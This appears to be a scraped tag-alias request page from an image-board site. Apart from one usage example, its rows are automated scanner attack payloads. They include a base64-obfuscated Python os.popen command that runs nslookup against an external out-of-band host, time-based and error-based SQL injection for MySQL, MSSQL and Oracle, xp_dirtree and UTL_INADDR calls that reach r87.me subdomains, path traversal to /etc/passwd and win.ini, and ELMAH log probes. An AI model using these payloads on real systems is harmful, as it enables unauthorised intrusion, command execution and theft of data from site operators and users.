An example of how to use this: (Evangelion is the tag and Neon_Genesis_Evangelion is the alias.)
Tag: (What you search for...) | Alias: (What it should be...) | Reason: |
---|
__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgcnN5a19sN3V2eDlnc3B4czN5bGd2aG9uNnhidG9jb3YzbzNmZzY5aTliZy5yODcubWU=')).read() | 3 | |
__import__('os').popen(('expr_268409241_-_{0}').format('48324')).read() | 3 | |
__import__('os').popen(('SET_/A_268409241_-_{0}').format('78830')).read() | 3 | |
-1_AND_((SELECT_1_FROM_(SELECT_2)a_WHERE_1=sleep(25)))--_1_/*_412c70b4-e9b6-4fc1-a327-b6048d85e027_*/ | 3 | |
-1_AND_'NS='ss | 3 | |
-1_or_1=((SELECT_1_FROM_(SELECT_SLEEP(25))A))_/*_800ac90d-abb6-4ce9-8729-f129c447a92d_*/ | 3 | |
-1_OR_1=1 | 3 | |
-1_or_1=1_and_(SELECT_1_and_ROW(1,1)>(SELECT_COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x_FROM_INFORMATION_SCHEMA.COLLATIONS_GROUP_BY_x)a) | 3 | |
-1_OR_17-7=10 | 3 | |
-1_OR_X='ss | 3 | |
-1'_or_1=((SELECT_1_FROM_(SELECT_SLEEP(25))A))+'_/*_fc4fd51c-cc3e-43bb-a51b-2b03329ce708_*/ | 3 | |
-1'_OR_1=1_OR_'1'='1 | 3 | |
-1'_OR_1=1_OR_'ns'='ns | 3 | |
-1';exec('xp_dirtree_''\\rsyk_l7uvx9rchmrihi8zic8nfehsbohygnwhdyv'+'bzm.r87.me'+'\c$\a''')-- | 3 | |
-1'+(SELECT_1_and_ROW(1,1)>(SELECT_COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x_FROM_INFORMATION_SCHEMA.COLLATIONS_GROUP_BY_x)a)+' | 3 | |
-1"_or_1=((SELECT_1_FROM_(SELECT_SLEEP(25))A))+"_/*_38d8cf9e-3407-44ef-94bb-20346fe3d8ce_*/ | 3 | |
-1"_OR_1=1_OR_"1"="1 | 3 | |
-1"_OR_1=1_OR_"ns"="ns | 3 | |
._._/._._/._._/._._/._._/._._/._._/._._/._._/._._/._._/etc/passwd | 3 | |
._._/._._/._._/._._/._._/._._/._._/._._/._._/._._/._._/windows/win.ini | 3 | |
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd | 3 | |
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini | 3 | |
....//....//....//....//....//....//....//....//....//....//....//etc/passwd | 3 | |
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini | 3 | |
...//...//...//...//...//...//...//...//...//...//...//etc/passwd | 3 | |
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini | 3 | |
../../../../../../../../../../xampp/apache/logs/access.log | 3 | |
((select_sleep(25)))a--_1_/*_f4b2c30a-bb57-482a-9623-7fe2830b36a3_*/ | 3 | |
((SELECT(1)FROM(SELECT(SLEEP(25)))A))_/*_6c7526de-9ae2-426c-9526-e93fc6800f7d_*/ | 3 | |
(268409241-8227) | 3 | |
(length(CTXSYS.DRITHSX.SN(user,(select_chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)_from_DUAL)))) | 3 | |
(length(CTXSYS.DRITHSX.SN(user,(select_UTL_INADDR.GET_HOST_ADDRESS('rsyk_l7uvx_q4me0g-5gxyxhnru89kfxdydqsvpf'||'bfc.r87.me')_from_DUAL)))) | 3 | |
(SELECT_1_and_ROW(1,1)>(SELECT_COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x_FROM_INFORMATION_SCHEMA.COLLATIONS_GROUP_BY_x)a) | 3 | |
(select_chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)_from_DUAL) | 3 | |
(SELECT_CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) | 3 | |
(select_convert(int,cast(0x5f21403264696c656d6d61_as_varchar(8000)))_from_syscolumns) | 3 | |
(select_dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25)_from_dual)_/*_b6ac4fdf-da4f-4946-8f41-bbe3e9001c4f_*/ | 3 | |
(select_UTL_INADDR.GET_HOST_ADDRESS('rsyk_l7uvxophfvss8-1cvy7vfs6nimdeedflqgn'||'bw4.r87.me')_from_DUAL) | 3 | |
[::1]/elmah | 3 | |
[::1]/elmah.axd | 3 | |